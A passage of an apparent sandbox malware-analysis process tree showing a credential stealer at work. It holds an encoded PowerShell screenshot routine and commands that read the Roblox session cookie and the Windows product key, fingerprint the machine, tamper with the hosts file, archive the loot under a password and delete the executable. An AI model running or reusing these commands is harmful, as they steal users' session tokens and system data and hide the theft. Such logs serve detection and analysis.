YwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4360
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cmfrmlf4\cmfrmlf4.cmdline"
        5⤵
        
        PID:4296
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES94FC.tmp" "c:\Users\Admin\AppData\Local\Temp\cmfrmlf4\CSC8966E8D82B984F31956464E68CE7D68C.TMP"
        6⤵
        
        PID:1448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1508
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4260
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1960
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3896
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2024
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4056
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5104
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4108
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3852
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1972
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4296
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI4282\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\dvAVC.zip" *"
    3⤵
    PID:4300
  - - C:\Users\Admin\AppData\Local\Temp\_MEI4282\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI4282\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\dvAVC.zip" *
      4⤵
      Executes dropped EXE
      PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4520
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\blank.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4088
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5016

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4360

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2116

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4032
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Windows\System32\drivers\etc\hosts
  2⤵
  PID:1496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd8258cc40,0x7ffd8258cc4c,0x7ffd8258cc58
  2⤵
  PID:1620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1944,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1960 /prefetch:3
  2⤵
  PID:2044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2564 /prefetch:8
  2⤵
  PID:4392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1
  2⤵
  PID:3752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:4312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4504,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4512 /prefetch:1
  2⤵
  PID:412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4596,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3712 /prefetch:1
  2⤵
  PID:3324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3180,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:8
  2⤵
  PID:3340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4524,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4692 /prefetch:8
  2⤵
  PID:4276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4988 /prefetch:8
  2⤵
  PID:4796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4892,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5068 /prefetch:8
  2⤵
  PID:3800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5024,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3156 /prefetch:8
  2⤵
  PID:3808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5192 /prefetch:8
  2⤵
  PID:644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5240,i,3472266632313927285,14033177220535197497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4380 /prefetch:2
  2⤵
  PID:2536

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd82be46f8,0x7ffd82be4708,0x7ffd82be4718
  2⤵
  PID:3044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,12451264172668073800,101730877970558802,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
  2⤵
  PID:380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,12451264172668073800,101730877970558802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
  2⤵
  PID:3248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,12451264172668073800,101730877970558802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
  2⤵
  PID:2036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12451264172668073800,101730877970558802,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
  2⤵
  PID:3392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12451264172668073800,101730877970558802,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:4136

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:228

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd82be46f8,0x7ffd82be4708,0x7ffd82be4718
  2⤵
  PID:4584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  2⤵
  PID:3036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
  2⤵
  PID:4728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
  2⤵
  PID:2336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
  2⤵
  PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
  2⤵
  PID:488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
  2⤵
  PID:4992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1
  2⤵
  PID:4812
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4284 /prefetch:8
  2⤵
  PID:3864
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4284 /prefetch:8
  2⤵
  PID:2744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:1
  2⤵
  PID:1092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1
  2⤵
  PID:5080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1
  2⤵
  PID:4272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4532 /prefetch:1
  2⤵
  PID:628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
  2⤵
  PID:864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2128,13945135150705861471,11271059395473912561,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:2664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
